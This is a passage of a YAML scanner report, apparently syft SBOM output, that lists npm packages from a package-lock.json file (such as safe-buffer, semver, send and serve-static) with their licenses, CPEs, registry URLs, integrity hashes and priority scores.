path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: run-parallel 1.2.0'
|
|
title: run-parallel 1.2.0
|
|
description: 'Package discovered: run-parallel 1.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ca5a4d8be889885f
|
|
name: run-parallel
|
|
version: 1.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:run-parallel:run-parallel:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:run-parallel:run_parallel:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:run_parallel:run-parallel:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:run_parallel:run_parallel:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:run:run-parallel:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:run:run_parallel:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/run-parallel@1.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz
|
|
integrity: sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==
|
|
dependencies:
|
|
queue-microtask: ^1.2.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0d59c1e836c63d4a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: safe-buffer 5.1.2'
|
|
title: safe-buffer 5.1.2
|
|
description: 'Package discovered: safe-buffer 5.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 36d9a8484ed180a6
|
|
name: safe-buffer
|
|
version: 5.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:safe-buffer:safe-buffer:5.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:safe-buffer:safe_buffer:5.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:safe_buffer:safe-buffer:5.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:safe_buffer:safe_buffer:5.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:safe:safe-buffer:5.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:safe:safe_buffer:5.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/safe-buffer@5.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz
|
|
integrity: sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 982541a2a19fdc52
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: safe-buffer 5.2.1'
|
|
title: safe-buffer 5.2.1
|
|
description: 'Package discovered: safe-buffer 5.2.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 28135efb01cb74b9
|
|
name: safe-buffer
|
|
version: 5.2.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:safe-buffer:safe-buffer:5.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:safe-buffer:safe_buffer:5.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:safe_buffer:safe-buffer:5.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:safe_buffer:safe_buffer:5.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:safe:safe-buffer:5.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:safe:safe_buffer:5.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/safe-buffer@5.2.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz
|
|
integrity: sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 186ed2340219a99c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: safer-buffer 2.1.2'
|
|
title: safer-buffer 2.1.2
|
|
description: 'Package discovered: safer-buffer 2.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: bc8acb243e9d9464
|
|
name: safer-buffer
|
|
version: 2.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:safer-buffer:safer-buffer:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:safer-buffer:safer_buffer:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:safer_buffer:safer-buffer:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:safer_buffer:safer_buffer:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:safer:safer-buffer:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:safer:safer_buffer:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/safer-buffer@2.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz
|
|
integrity: sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2ab87631c01bfc3f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: scheduler 0.17.0'
|
|
title: scheduler 0.17.0
|
|
description: 'Package discovered: scheduler 0.17.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e689757d7bf8470d
|
|
name: scheduler
|
|
version: 0.17.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:scheduler:scheduler:0.17.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/scheduler@0.17.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/scheduler/-/scheduler-0.17.0.tgz
|
|
integrity: sha512-7rro8Io3tnCPuY4la/NuI5F2yfESpnfZyT6TtkXnSWVkcu0BCDJ+8gk5ozUaFaxpIyNuWAPXrH0yFcSi28fnDA==
|
|
dependencies:
|
|
loose-envify: ^1.1.0
|
|
object-assign: ^4.1.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: bbbd7dd6a8a5a506
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: scheduler 0.23.2'
|
|
title: scheduler 0.23.2
|
|
description: 'Package discovered: scheduler 0.23.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d0ebbd8a4bc7ada1
|
|
name: scheduler
|
|
version: 0.23.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:scheduler:scheduler:0.23.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/scheduler@0.23.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/scheduler/-/scheduler-0.23.2.tgz
|
|
integrity: sha512-UOShsPwz7NrMUqhR6t0hWjFduvOzbtv7toDH1/hIrfRNIDBnnBWd0CwJTGvTpngVlmwGCdP9/Zl/tVrDqcuYzQ==
|
|
dependencies:
|
|
loose-envify: ^1.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 613adae5df8a79db
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: scmp 2.1.0'
|
|
title: scmp 2.1.0
|
|
description: 'Package discovered: scmp 2.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 607830ce210254e3
|
|
name: scmp
|
|
version: 2.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:scmp:scmp:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/scmp@2.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/scmp/-/scmp-2.1.0.tgz
|
|
integrity: sha512-o/mRQGk9Rcer/jEEw/yw4mwo3EU/NvYvp577/Btqrym9Qy5/MdWGBqipbALgd2lrdWTJ5/gqDusxfnQBxOxT2Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 186e8c930a60e0f6
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: selderee 0.11.0'
|
|
title: selderee 0.11.0
|
|
description: 'Package discovered: selderee 0.11.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a6fb1c756dcd04fc
|
|
name: selderee
|
|
version: 0.11.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:selderee:selderee:0.11.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/selderee@0.11.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/selderee/-/selderee-0.11.0.tgz
|
|
integrity: sha512-5TF+l7p4+OsnP8BCCvSyZiSPc4x4//p5uPwK8TCnVPJYRmU2aYKMpOXvw8zM5a5JvuuCGN1jmsMwuU2W02ukfA==
|
|
dependencies:
|
|
parseley: ^0.12.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 809205930987a974
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: semver 7.7.4'
|
|
title: semver 7.7.4
|
|
description: 'Package discovered: semver 7.7.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: dc47801cc9b2ec78
|
|
name: semver
|
|
version: 7.7.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:npmjs:semver:7.7.4:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/semver@7.7.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/semver/-/semver-7.7.4.tgz
|
|
integrity: sha512-vFKC2IEtQnVhpT78h1Yp8wzwrf8CM+MzKMHGJZfBtzhZNycRFnXsHk6E5TxIkkMsgNS7mdX3AGB7x2QM2di4lA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 67469cce48d87167
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: send 0.19.2'
|
|
title: send 0.19.2
|
|
description: 'Package discovered: send 0.19.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 1d81dd407a94f88a
|
|
name: send
|
|
version: 0.19.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:send_project:send:0.19.2:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/send@0.19.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/send/-/send-0.19.2.tgz
|
|
integrity: sha512-VMbMxbDeehAxpOtWJXlcUS5E8iXh6QmN+BkRX1GARS3wRaXEEgzCcB10gTQazO42tpNIya8xIyNx8fll1OFPrg==
|
|
dependencies:
|
|
debug: 2.6.9
|
|
depd: 2.0.0
|
|
destroy: 1.2.0
|
|
encodeurl: ~2.0.0
|
|
escape-html: ~1.0.3
|
|
etag: ~1.8.1
|
|
fresh: ~0.5.2
|
|
http-errors: ~2.0.1
|
|
mime: 1.6.0
|
|
ms: 2.1.3
|
|
on-finished: ~2.4.1
|
|
range-parser: ~1.2.1
|
|
statuses: ~2.0.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 3a3b9a5d9af10f0c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: serve-static 1.16.3'
|
|
title: serve-static 1.16.3
|
|
description: 'Package discovered: serve-static 1.16.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0a7cfe5561f2b18b
|
|
name: serve-static
|
|
version: 1.16.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:serve-static:serve-static:1.16.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:serve-static:serve_static:1.16.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:serve_static:serve-static:1.16.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:serve_static:serve_static:1.16.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:serve:serve-static:1.16.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:serve:serve_static:1.16.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/serve-static@1.16.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/serve-static/-/serve-static-1.16.3.tgz
|
|
integrity: sha512-x0RTqQel6g5SY7Lg6ZreMmsOzncHFU7nhnRWkKgWuMTu5NN0DR5oruckMqRvacAN9d5w6ARnRBXl9xhDCgfMeA==
|
|
dependencies:
|
|
encodeurl: ~2.0.0
|
|
escape-html: ~1.0.3
|
|
parseurl: ~1.3.3
|
|
send: ~0.19.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: aaaf7e5ff977361c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: set-blocking 2.0.0'
|
|
title: set-blocking 2.0.0
|
|
description: 'Package discovered: set-blocking 2.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: afe02a75a981b13d
|
|
name: set-blocking
|
|
version: 2.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:set-blocking:set-blocking:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:set-blocking:set_blocking:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:set_blocking:set-blocking:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:set_blocking:set_blocking:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:set:set-blocking:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:set:set_blocking:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/set-blocking@2.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz
|
|
integrity: sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 506518f9c8ac4766
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: setprototypeof 1.2.0'
|
|
title: setprototypeof 1.2.0
|
|
description: 'Package discovered: setprototypeof 1.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: fc983ad918ad063a
|
|
name: setprototypeof
|
|
version: 1.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
